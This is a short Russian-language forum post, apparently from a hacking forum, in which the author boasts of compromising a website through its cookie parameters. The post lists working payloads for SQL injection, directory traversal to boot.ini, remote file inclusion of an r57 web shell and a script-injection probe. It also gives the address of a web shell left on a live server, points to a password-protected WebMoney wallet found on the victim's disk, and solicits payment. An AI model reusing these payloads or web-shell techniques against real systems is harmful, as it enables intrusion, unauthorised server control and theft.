А вот есть там SQL injection! И еще Directory traversal, File inclusion и Cross Site Scripting. И все это в cookies, в параметре lang и в char. char=' ; lang=../../../../../../../../boot.ini ; lang=http://site.ru/r57.php ; lang=><script>alert(/ok/)</script>. Тут - http://85.115.112.18/inc.php r57shell =)

На диске d:\lol валяется webmoney с паролем. Мой кошелек - Z305549227839 если что8).

Shell удалил, так как уже один есть.

__________________

Завтра будет.Лучше.